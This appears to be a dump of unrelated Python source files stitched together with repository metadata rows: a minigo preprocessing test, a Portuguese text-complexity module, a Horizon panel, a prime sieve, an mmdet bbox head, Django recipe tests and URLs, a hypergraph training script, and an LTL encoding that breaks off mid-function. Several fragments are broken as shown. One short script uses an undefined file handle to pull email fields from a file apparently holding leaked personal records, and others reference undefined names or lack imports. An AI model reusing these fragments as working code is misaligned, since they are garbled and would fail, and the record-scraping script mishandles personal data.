from __future__ import division
from __future__ import print_function
import itertools
import tempfile
import tensorflow as tf # pylint: disable=g-bad-import-order
from research.minigo import coords
from research.minigo import features
from research.minigo import go
from research.minigo import model_params
import numpy as np
from research.minigo import preprocessing
from research.minigo import utils_test
tf.logging.set_verbosity(tf.logging.ERROR)
TEST_SGF = '''(;CA[UTF-8]SZ[9]PB[Murakawa Daisuke]PW[Iyama Yuta]KM[6.5]
HA[0]RE[W+1.5]GM[1];B[fd];W[cf])'''
def create_random_data(num_examples):
raw_data = []
for _ in range(num_examples):
feature = np.random.random([
utils_test.BOARD_SIZE, utils_test.BOARD_SIZE,
features.NEW_FEATURES_PLANES]).astype(np.uint8)
pi = np.random.random([utils_test.BOARD_SIZE * utils_test.BOARD_SIZE
+ 1]).astype(np.float32)
value = np.random.random()
raw_data.append((feature, pi, value))
return raw_data
class TestPreprocessing(utils_test.MiniGoUnitTest):
def extract_data(self, tf_record, filter_amount=1):
pos_tensor, label_tensors = preprocessing.get_input_tensors(
model_params.DummyMiniGoParams(), 1, [tf_record], num_repeats=1,
shuffle_records=False, shuffle_examples=False,
filter_amount=filter_amount)
recovered_data = []
with tf.Session() as sess:
while True:
try:
pos_value, label_values = sess.run([pos_tensor, label_tensors])
recovered_data.append((
pos_value,
label_values['pi_tensor'],
label_values['value_tensor']))
except tf.errors.OutOfRangeError:
break
return recovered_data
def assertEqualData(self, data1, data2):
# Assert that two data are equal, where both are of form:
# data = List<Tuple<feature_array, pi_array, value>>
self.assertEqual(len(data1), len(data2))
for datum1, datum2 in zip(data1, data2):
# feature
self.assertEqualNPArray(datum1[0], datum2[0])
# pi
self.assertEqualNPArray(datum1[1], datum2[1])
# value
self.assertEqual(datum1[2], datum2[2])
def test_serialize_round_trip(self):
np.random.seed(1)
raw_data = create_random_data(10)
tfexamples = list(map(preprocessing.make_tf_example, *zip(*raw_data)))
with tempfile.NamedTemporaryFile() as f:
preprocessing.write_tf_examples(f.name, tfexamples)
recovered_data = self.extract_data(f.name)
self.assertEqualData(raw_data, recovered_data)
def test_filter(self):
raw_data = create_random_data(100)
tfexamples = list(map(preprocessing.make_tf_example, *zip(*raw_data)))
with tempfile.NamedTemporaryFile() as f:
preprocessing.write_tf_examples(f.name, tfexamples)
recovered_data = self.extract_data(f.name, filter_amount=.05)
self.assertLess(len(recovered_data), 50)
def test_serialize_round_trip_no_parse(self):
np.random.seed(1)
raw_data = create_random_data(10)
tfexamples = list(map(preprocessing.make_tf_example, *zip(*raw_data)))
with tempfile.NamedTemporaryFile() as start_file, \
tempfile.NamedTemporaryFile() as rewritten_file:
preprocessing.write_tf_examples(start_file.name, tfexamples)
# We want to test that the rewritten, shuffled file contains correctly
# serialized tf.Examples.
batch_size = 4
batches = list(preprocessing.shuffle_tf_examples(
1000, batch_size, [start_file.name]))
# 2 batches of 4, 1 incomplete batch of 2.
self.assertEqual(len(batches), 3)
# concatenate list of lists into one list
all_batches = list(itertools.chain.from_iterable(batches))
for _ in batches:
preprocessing.write_tf_examples(
rewritten_file.name, all_batches, serialize=False)
original_data = self.extract_data(start_file.name)
recovered_data = self.extract_data(rewritten_file.name)
# stuff is shuffled, so sort before checking equality
def sort_key(nparray_tuple):
return nparray_tuple[2]
original_data = sorted(original_data, key=sort_key)
recovered_data = sorted(recovered_data, key=sort_key)
self.assertEqualData(original_data, recovered_data)
def test_make_dataset_from_sgf(self):
with tempfile.NamedTemporaryFile() as sgf_file, \
tempfile.NamedTemporaryFile() as record_file:
sgf_file.write(TEST_SGF.encode('utf8'))
sgf_file.seek(0)
preprocessing.make_dataset_from_sgf(
utils_test.BOARD_SIZE, sgf_file.name, record_file.name)
recovered_data = self.extract_data(record_file.name)
start_pos = go.Position(utils_test.BOARD_SIZE)
first_move = coords.from_sgf('fd')
next_pos = start_pos.play_move(first_move)
second_move = coords.from_sgf('cf')
expected_data = [
(
features.extract_features(utils_test.BOARD_SIZE, start_pos),
preprocessing._one_hot(utils_test.BOARD_SIZE, coords.to_flat(
utils_test.BOARD_SIZE, first_move)), -1
),
(
features.extract_features(utils_test.BOARD_SIZE, next_pos),
preprocessing._one_hot(utils_test.BOARD_SIZE, coords.to_flat(
utils_test.BOARD_SIZE, second_move)), -1
)
]
self.assertEqualData(expected_data, recovered_data)
if __name__ == '__main__':
tf.test.main()
| 39.64497 | 83 | 0.647015 | [
"Apache-2.0"
] | jdavidagudelo/tensorflow-models | research/minigo/preprocessing_test.py | 6,700 | Python |
# -*- coding: utf-8 -*-
"""
Criado por Lucas Fonseca Lage em 04/03/2020
"""
import re, os, spacy
import numpy as np
from my_wsd import my_lesk
from unicodedata import normalize
from document import Document
from gensim.models import Phrases
# Carregamento do modelo Spacy
nlp = spacy.load('pt_core_news_lg')
# Carregamento dos modelos de bigramas e trigramas
#bigram_model = Phrases.load('./n_gram_models/bigram_gen_model')
#trigram_model = Phrases.load('./n_gram_models/trigram_gen_model')
freq_pos_tag = [('DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'DET', 'NOUN'),
('VERB', 'DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'NOUN'),
('VERB', 'DET', 'NOUN', 'ADP', 'DET', 'NOUN', 'PUNCT'),
('DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'NOUN', 'PUNCT'),
('NOUN', 'ADP', 'NOUN', 'ADP', 'DET', 'NOUN', 'PUNCT'),
('VERB', 'ADP', 'DET', 'NOUN', 'ADP', 'NOUN', 'PUNCT'),
('VERB', 'DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'DET'),
('DET', 'NOUN', 'ADP', 'DET', 'NOUN', 'ADP', 'NOUN'),
('NOUN', 'ADP', 'DET', 'NOUN', 'ADP', 'NOUN', 'PUNCT'),
('VERB', 'DET', 'NOUN', 'ADP', 'NOUN', 'ADJ', 'PUNCT')]
def corpus_reader(path):
'''Lê as extensões dos arquivos .xml no caminho especificado como path e
retorna uma tupla com duas listas.Uma lista contém os paths para os arquivos
.xml e a outra contém os arquivos Document gerados para aquele arquilo .xml
'''
prog = re.compile('(\.xml)$')
doc_list = []
f = []
fps = []
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
fps.append(os.path.normpath(os.path.join(dirpath,filename)))
for path in fps:
if re.search(prog,path):
f.append(path)
doc_list.append(Document(path))
return (f, doc_list)
def corpus_yeeter(path):
'''Similar ao corpus_reader. Recebe um caminho para a pasta contendo o
corpus e cria um generator. Cada iteração retorna uma tupla contendo um
caminho para o arquivo .xml e o objeto Document criado a partir do mesmo
'''
prog = re.compile('(\.xml)$')
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
if re.search(prog,filename):
path = os.path.normpath(os.path.join(dirpath,filename))
yield (path, Document(path))
def all_fps(path_to_dir):
'''Recebe o caminho para o diretório e retorna uma lista com os caminhos
absolutos para os arquivos que estão nele
'''
fps = []
for dirpath, dirnames, filenames in os.walk(path_to_dir):
for filename in filenames:
fps.append(os.path.normpath(os.path.join(dirpath,filename)))
return fps
def remover_acentos(text):
'''Remove os acentos da string "text". Usada somente na função pre_process
'''
return normalize('NFKD', text).encode('ASCII', 'ignore').decode('ASCII')
def pre_process(text):
'''Realiza um pré processamento da string de entrada "text".
Retira espaços em branco extras e retira caracteres não alfanuméricos
'''
text = re.sub('\s{2,}',' ',text).strip().lower()
doc = nlp(text)
#Retira numeros
text = ' '.join([token.text for token in doc if token.is_alpha == True
and token.pos_ != 'PUNCT'])
return remover_acentos(text)
def bi_trigram_counter(sentence_list):
"""Retorna uma tupla com o numero de bigramas e trigramas.
Recebe como entrada o texto segmentado em uma lista de sentencas.
"""
bi_sent_list = []
tri_sent_list = []
for sentence in sentence_list:
proc_sent = pre_process(sentence).lower().split()
bigram_sentence = bigram_model[proc_sent]
bi_sent_list.append(bigram_sentence)
for bi_sent in bi_sent_list:
tri_sent = trigram_model[bi_sent]
tri_sent_list.append(tri_sent)
return(bigram_number(bi_sent_list),trigram_number(tri_sent_list))
def bigram_number(bigram_sent_list):
'''Conta o número de bigramas encontrados na redação. Recebe uma lista de
sentenças que configuram a redação.
'''
count = 0
for sent in bigram_sent_list:
for token in sent:
if re.search(u'_',token):
count += 1
return count
def trigram_number(trigram_sent_list):
'''Conta o número de trigramas encontrados na redação. Recebe uma lista de
sentenças que configuram a redação
'''
count = 0
for sent in trigram_sent_list:
for token in sent:
if re.search('(?<=_).+_',token):
count += 1
return count
def n_most_freq_pos_tag_seq(sent_list):
''' Procura na lista de sentenças a sequências de pos_tag mais frequentes e
retorna a quantidade encontrada.
'''
n = 0
pos_list = []
for i in sent_list:
sent_nlp = nlp(i)
sent_pos = []
for token in sent_nlp:
sent_pos.append(token.pos_)
pos_list.append(sent_pos)
for line in pos_list:
if len(line) < 7:
continue
if len(line) >= 7:
while len(line) >= 7:
t = tuple(line[0:7])
if t in freq_pos_tag:
n+=1
line.pop(0)
return n
def subj_n_elements(sentence_list):
''' Recebe a lista de sentenças da redação. Conta a quantidade de elementos
abaixo do sujeito na árvore sintática gerada pelo "dependecy parser" do
Spacy. Retorna o número de sujeitos que possuem uma quantidade de elementos
maior que 7 e também o número total de elementos que fazem parte de um
sujeito em toda a redação.
'''
r_list = []
for spacy_doc in nlp.pipe(sentence_list):
big_subj = 0
subj_el_total = 0
for token in spacy_doc:
if token.dep_ == 'nsubj':
size = len([desc for desc in token.subtree if desc.is_alpha])
if size >= 7:
big_subj += 1
subj_el_total += size
r_list.append((big_subj,subj_el_total))
return tuple([sum(i) for i in zip(*r_list)])
def synset_count(sent_list, lang='por', pos='NOUN'):
i = 0
for spacy_doc in nlp.pipe(sent_list):
for token in spacy_doc:
if token.pos_ == pos:
i += len(wn.synsets(token.text, lang=lang))
return (i, i/len(sent_list))
def hypo_hyper_count(sent_list):
hyper = []
hypo = []
size = len(sent_list)
for sent in nlp.pipe(sent_list):
ss = [my_lesk(sent,token.text) for token in sent if token.pos_=='NOUN']
for s in ss:
try:
hyper.append(len(s.hypernyms()))
hypo.append(len(s.hyponyms()))
except AttributeError:
continue
h_er_sum = sum(hyper)
h_o_sum = sum(hypo)
return(h_er_sum,h_er_sum/size, h_o_sum,h_o_sum/size)
| 33.725 | 80 | 0.621794 | [
"MIT"
] | lflage/complexidade_textual | complexidade_textual.py | 6,783 | Python |
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2013 NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from openstack_dashboard.dashboards.admin import dashboard
import horizon
class NetworkTopology(horizon.Panel):
name = _("Network Topology")
slug = 'network_topology'
permissions = ('openstack.services.network', )
#dashboard.Admin.register(Networks)
| 36.2 | 78 | 0.753223 | [
"Apache-2.0"
] | xuweiliang/Codelibrary | openstack_dashboard/dashboards/admin/network_topology/panel.py | 1,086 | Python |
def erat2():
D = {}
yield 2
for q in itertools.islice(itertools.count(3), 0, None, 2):
p = D.pop(q, None)
if p is None:
D[q*q] = q
yield q
else:
x = p + q
while x in D or not (x&1):
x += p
D[x] = p
| 22.142857 | 62 | 0.367742 | [
"Apache-2.0"
] | asukumari/python-cookbook-2e-alexmartelli | cb2_examples/cb2_18_10_exm_2.py | 310 | Python |
import torch.nn as nn
from mmcv.cnn import ConvModule
from mmdet.models.builder import HEADS
from .bbox_head import BBoxHead
@HEADS.register_module()
class ConvFCBBoxHeadSeparate(BBoxHead):
r"""More general bbox head, with shared conv and fc layers and two optional
separated branches.
.. code-block:: none
/-> cls convs -> cls fcs -> cls
shared convs -> shared fcs
\-> reg convs -> reg fcs -> reg
""" # noqa: W605
def __init__(self,
num_shared_convs=0,
num_shared_fcs=0,
num_cls_convs=0,
num_cls_fcs=0,
num_reg_convs=0,
num_reg_fcs=0,
conv_out_channels=256,
fc_out_channels=1024,
conv_cfg=None,
norm_cfg=None,
*args,
**kwargs):
super(ConvFCBBoxHeadSeparate, self).__init__(*args, **kwargs)
assert (num_shared_convs + num_shared_fcs + num_cls_convs +
num_cls_fcs + num_reg_convs + num_reg_fcs > 0)
if num_cls_convs > 0 or num_reg_convs > 0:
assert num_shared_fcs == 0
if not self.with_cls:
assert num_cls_convs == 0 and num_cls_fcs == 0
if not self.with_reg:
assert num_reg_convs == 0 and num_reg_fcs == 0
self.num_shared_convs = num_shared_convs
self.num_shared_fcs = num_shared_fcs
self.num_cls_convs = num_cls_convs
self.num_cls_fcs = num_cls_fcs
self.num_reg_convs = num_reg_convs
self.num_reg_fcs = num_reg_fcs
self.conv_out_channels = conv_out_channels
self.fc_out_channels = fc_out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
# add shared convs and fcs
self.shared_convs, self.shared_fcs, last_layer_dim = \
self._add_conv_fc_branch(
self.num_shared_convs, self.num_shared_fcs, self.in_channels,
True)
self.shared_out_channels = last_layer_dim
# add cls specific branch
self.cls_convs, self.cls_fcs, self.cls_last_dim = \
self._add_conv_fc_branch(
self.num_cls_convs, self.num_cls_fcs, self.shared_out_channels)
# add reg specific branch
self.reg_convs, self.reg_fcs, self.reg_last_dim = \
self._add_conv_fc_branch(
self.num_reg_convs, self.num_reg_fcs, self.shared_out_channels)
if self.num_shared_fcs == 0 and not self.with_avg_pool:
if self.num_cls_fcs == 0:
self.cls_last_dim *= self.roi_feat_area
if self.num_reg_fcs == 0:
self.reg_last_dim *= self.roi_feat_area
self.relu = nn.ReLU(inplace=True)
# reconstruct fc_cls and fc_reg since input channels are changed
if self.with_cls:
self.fc_cls = nn.Linear(self.cls_last_dim, self.num_classes + 1)
if self.with_reg:
out_dim_reg = (4 if self.reg_class_agnostic else 4 *
self.num_classes)
self.fc_reg = nn.Linear(self.reg_last_dim, out_dim_reg)
def _add_conv_fc_branch(self,
num_branch_convs,
num_branch_fcs,
in_channels,
is_shared=False):
"""Add shared or separable branch
convs -> avg pool (optional) -> fcs
"""
last_layer_dim = in_channels
# add branch specific conv layers
branch_convs = nn.ModuleList()
if num_branch_convs > 0:
for i in range(num_branch_convs):
conv_in_channels = (
last_layer_dim if i == 0 else self.conv_out_channels)
branch_convs.append(
ConvModule(
conv_in_channels,
self.conv_out_channels,
3,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg))
last_layer_dim = self.conv_out_channels
# add branch specific fc layers
branch_fcs = nn.ModuleList()
if num_branch_fcs > 0:
# for shared branch, only consider self.with_avg_pool
# for separated branches, also consider self.num_shared_fcs
if (is_shared
or self.num_shared_fcs == 0) and not self.with_avg_pool:
last_layer_dim *= self.roi_feat_area
for i in range(num_branch_fcs):
fc_in_channels = (
last_layer_dim if i == 0 else self.fc_out_channels)
branch_fcs.append(
nn.Linear(fc_in_channels, self.fc_out_channels))
last_layer_dim = self.fc_out_channels
return branch_convs, branch_fcs, last_layer_dim
def init_weights(self):
super(ConvFCBBoxHeadSeparate, self).init_weights()
# conv layers are already initialized by ConvModule
for module_list in [self.shared_fcs, self.cls_fcs, self.reg_fcs]:
for m in module_list.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight)
nn.init.constant_(m.bias, 0)
def forward(self, x_cat, x):
# shared part
if self.num_shared_convs > 0:
for conv in self.shared_convs:
x = conv(x)
if self.num_shared_fcs > 0:
if self.with_avg_pool:
x = self.avg_pool(x)
x = x.flatten(1)
for fc in self.shared_fcs:
x = self.relu(fc(x))
# separate branches
x_cls = x_cat
x_reg = x
for conv in self.cls_convs:
x_cls = conv(x_cls)
if x_cls.dim() > 2:
if self.with_avg_pool:
x_cls = self.avg_pool(x_cls)
x_cls = x_cls.flatten(1)
for fc in self.cls_fcs:
x_cls = self.relu(fc(x_cls))
for conv in self.reg_convs:
x_reg = conv(x_reg)
if x_reg.dim() > 2:
if self.with_avg_pool:
x_reg = self.avg_pool(x_reg)
x_reg = x_reg.flatten(1)
for fc in self.reg_fcs:
x_reg = self.relu(fc(x_reg))
cls_score = self.fc_cls(x_cls) if self.with_cls else None
bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
return cls_score, bbox_pred
| 37.804598 | 79 | 0.564001 | [
"Apache-2.0"
] | Qianna00/mmdetection | mmdet/models/roi_heads/bbox_heads/bbox_head_separate.py | 6,578 | Python |
import tempfile
import os
from PIL import Image
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Recipe, Tag, Ingredient
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
RECIPE_URL = reverse('recipe:recipe-list')
def image_upload_url(recipe_id):
"""Return URL for recipe image upload"""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
def detail_url(recipe_id):
"""Return recipe detail URL"""
return reverse('recipe:recipe-detail', args=[recipe_id])
def sample_tag(user, name='Main Course'):
"""Create and return a sample tag"""
return Tag.objects.create(user=user, name=name)
def sample_ingredient(user, name='Cinnamon'):
"""Create and return a sample ingredient"""
return Ingredient.objects.create(user=user, name=name)
def sample_recipe(user, **params):
"""Create and return a sample recipe"""
defaults = {
'title': 'Sample Recipe',
'time_minutes': 10,
'price': 5.00
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
class PublicRecipeApiTests(TestCase):
"""Test unathenticated recipe API access"""
def setUp(self):
self.client = APIClient()
def test_auth_required(self):
"""Test that authentication is required"""
res = self.client.get(RECIPE_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Test authenticated API access"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'[email protected]',
'testpass'
)
self.client.force_authenticate(self.user)
def test_retrieve_recipe(self):
"""Test retrieving a list of recipe"""
sample_recipe(user=self.user)
sample_recipe(user=self.user)
res = self.client.get(RECIPE_URL)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test retrieving recipes for user"""
user2 = get_user_model().objects.create_user(
'[email protected]',
'otherpass'
)
sample_recipe(user=user2)
sample_recipe(user=self.user)
res = self.client.get(RECIPE_URL)
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data, serializer.data)
def test_view_recipe_detail(self):
"""Test viewing a recipe details"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
recipe.ingredients.add(sample_ingredient(user=self.user))
url = detail_url(recipe.id)
res = self.client.get(url)
serializer = RecipeDetailSerializer(recipe)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_create_basic_recipe(self):
"""Test creating recipe"""
payload = {
'title': 'Chocolate cheesecake',
'time_minutes': 30,
'price': 5.00
}
res = self.client.post(RECIPE_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
for key in payload.keys():
self.assertEqual(payload[key], getattr(recipe, key))
def test_create_recipe_with_tags(self):
"""Test creating recipe with tags"""
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Dessert')
payload = {
'title': 'Avocado lime cheesecake',
'tags': [tag1.id, tag2.id],
'time_minutes': 60,
'price': 20.00
}
res = self.client.post(RECIPE_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
tags = recipe.tags.all()
self.assertEqual(tags.count(), 2)
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
def test_create_recipe_with_ingredients(self):
"""Test creating recipe with ingredients"""
ingredient1 = sample_ingredient(user=self.user, name='Prawns')
ingredient2 = sample_ingredient(user=self.user, name='Ginger')
payload = {
'title': 'Thai prawn red curry',
'ingredients': [ingredient1.id, ingredient2.id],
'time_minutes': 20,
'price': 7.00
}
res = self.client.post(RECIPE_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ingredients = recipe.ingredients.all()
self.assertEqual(ingredients.count(), 2)
self.assertIn(ingredient1, ingredients)
self.assertIn(ingredient2, ingredients)
def test_partial_update_recipe(self):
"""Test updating a recipe with patch"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
new_tag = sample_tag(user=self.user, name='Curry')
payload = {
'title': 'Chicken tikka',
'tags': [new_tag.id]
}
url = detail_url(recipe.id)
self.client.patch(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(new_tag, tags)
def test_full_update_recipe(self):
"""Test update recipe with put"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
payload = {
'title': 'Spaghetti Carbonara',
'time_minutes': 25,
'price': 5.00
}
url = detail_url(recipe.id)
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
class RecipeImageUploadTests(TestCase):
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'[email protected]',
'testpass'
)
self.client.force_authenticate(self.user)
self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
img.save(ntf, format='JPEG')
ntf.seek(0)
res = self.client.post(url, {'image': ntf}, format='multipart')
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertIn('image', res.data)
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_filter_recipes_by_tags(self):
"""returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetables curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3 = sample_recipe(self.user, title='Fish and chips')
res = self.client.get(
RECIPE_URL,
{'tags': f'{tag1.id}, {tag2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
def test_filter_recipes_by_ingredients(self):
"""returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetables curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
ingredient1 = sample_ingredient(user=self.user, name='Vegan')
ingredient2 = sample_ingredient(user=self.user, name='Vegetarian')
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3 = sample_recipe(self.user, title='Fish and chips')
res = self.client.get(
RECIPE_URL,
{'ingredients': f'{ingredient1.id}, {ingredient2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
| 34.221453 | 78 | 0.642568 | [
"MIT"
] | Ahmed-Gemmy/recipe-app-api | app/recipe/tests/test_recipe_api.py | 9,890 | Python |
# Copyright (c) 2021. Slonos Labs. All rights Reserved.
| 28.5 | 56 | 0.719298 | [
"MIT"
] | kapousa/BrontoMind2 | app/base/gg.py | 57 | Python |
from django.conf.urls import include, url
from django.views.generic.base import TemplateView
from antioch.plugins.signup.views import ActivationView
from antioch.plugins.signup.views import RegistrationView
app_name='signup'
urlpatterns = [
url(r'^activate/complete/$',
TemplateView.as_view(template_name='registration/activation_complete.html'),
name='registration_activation_complete'),
# Activation keys get matched by \w+ instead of the more specific
# [a-fA-F0-9]{40} because a bad activation key should still get to the view;
# that way it can return a sensible "invalid key" message instead of a
# confusing 404.
url(r'^activate/(?P<activation_key>\w+)/$',
ActivationView.as_view(),
name='registration_activate'),
url(r'^register/$',
RegistrationView.as_view(),
name='registration_register'),
url(r'^register/complete/$',
TemplateView.as_view(template_name='registration/registration_complete.html'),
name='registration_complete'),
url(r'^register/closed/$',
TemplateView.as_view(template_name='registration/registration_closed.html'),
name='registration_disallowed'),
]
| 39.9 | 86 | 0.716792 | [
"MIT"
] | philchristensen/antioch | antioch/plugins/signup/urls.py | 1,197 | Python |
"""Trains a hypergraph machine on MNIST and generates Figure 1 panels b and c
of Discrete and continuous learning machines
"""
import numpy as np
import torch
import torch.nn.functional as F
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from hypergraph_machines.hypergraph_machine import HypergraphMachine
from hypergraph_machines.utils import train, test, visualise_graph
from hypergraph_machines.dataset_loader import load_dataset
from hypergraph_machines.utils import BestModelSaver, generate_timestamp, reg_loss
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(context="paper", style="white")
plt.ion()
device = torch.device("cuda")
timestamp = generate_timestamp()
batch_size, num_epochs = 128, 100
train_loader,\
test_loader,\
image_size = load_dataset("MNIST", batch_size, data_folder = "../../data")
model = HypergraphMachine((1,28,28), 10, number_of_classes = 10, tol = 1e-6,
limit_image_upsample = 2, prune=True).to(device)
optimizer = torch.optim.SGD(model.parameters(), lr= 3e-3)
saver = BestModelSaver('./checkpoints' + timestamp)
for epoch in range(1, num_epochs + 1):
print("starting epoch {} of {}".format(epoch, num_epochs))
train(model, device, train_loader, optimizer, epoch,
loss_func = reg_loss, loss_inputs = [model, F.nll_loss, 1])
loss, acc = test(model, device, test_loader)
saver.save(model, optimizer, epoch, loss, acc)
if epoch % 10 == 1:
f,ax = plt.subplots()
visualise_graph(model, ax=ax)
f.suptitle("epoch {}".format(epoch))
| 40.871795 | 82 | 0.737139 | [
"MIT"
] | Veos-Digital/hypergraph_machines | hypergraph_machines/examples/generate_figure.py | 1,594 | Python |
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 10 08:10:27 2018
@author: lenovo-pc
"""
file_path='D://aaa//kaifangX.txt'
email_path='D://aaa//99.txt'
file_path=open(file_path,'w',encoding='utf-8')
email_path=open(email_path,'w',encoding='utf-8')
for i in range(10000):
try:
c=b.readline().split(',')[-2]
b.write(c)
except Exception as e:
print(e)
print('没有邮箱')
print(c) | 22.631579 | 49 | 0.574419 | [
"Apache-2.0"
] | 15048040369/-1 | Frank.py | 438 | Python |
from typing import Tuple, FrozenSet
from collections import Iterable
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or
from mathsat import msat_make_leq, msat_make_equal
from mathsat import msat_make_number, msat_make_plus
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def check_ltl(menv: msat_env, enc: LTLEncoder) -> Tuple[Iterable, msat_term,
msat_term, msat_term]:
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
i = msat_declare_function(menv, "i", real_type)
i = msat_make_constant(menv, i)
r = msat_declare_function(menv, "r", real_type)
r = msat_make_constant(menv, r)
l = msat_declare_function(menv, "l", real_type)
l = msat_make_constant(menv, l)
inc_i = msat_declare_function(menv, "inc_i", bool_type)
inc_i = msat_make_constant(menv, inc_i)
x_i = msat_declare_function(menv, name_next("i"), real_type)
x_i = msat_make_constant(menv, x_i)
x_r = msat_declare_function(menv, name_next("r"), real_type)
x_r = msat_make_constant(menv, x_r)
x_l = msat_declare_function(menv, name_next("l"), real_type)
x_l = msat_make_constant(menv, x_l)
x_inc_i = msat_declare_function(menv, name_next("inc_i"), bool_type)
x_inc_i = msat_make_constant(menv, x_inc_i)
curr2next = {i: x_i, r: x_r, l: x_l, inc_i: x_inc_i}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
r_gt_0 = msat_make_gt(menv, r, zero)
r_lt_l = msat_make_lt(menv, r, l)
i_geq_0 = msat_make_geq(menv, i, zero)
init = msat_make_and(menv, r_gt_0, r_lt_l)
